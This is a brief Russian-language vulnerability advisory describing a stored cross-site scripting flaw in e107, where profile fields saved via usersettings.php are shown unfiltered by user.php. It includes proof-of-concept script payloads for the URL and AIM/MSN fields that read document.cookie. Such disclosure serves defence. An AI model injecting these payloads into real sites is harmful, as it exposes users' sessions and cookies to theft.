Программа: e107 

Уязвимость обнаружена в e107. Удаленный авторизованный пользователь может выполнить XSS нападение.
Сценарий 'usersettings.php' не фильтрует данные, представленные пользователем, перед тем, как 'user.php' отобразит информацию. 

Пример: 

URL field:
http://www.mysiteurl.com/<script>alert(document.cookie)</script>

AIM/MSN field: 
<script>alert(document.cookie)</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии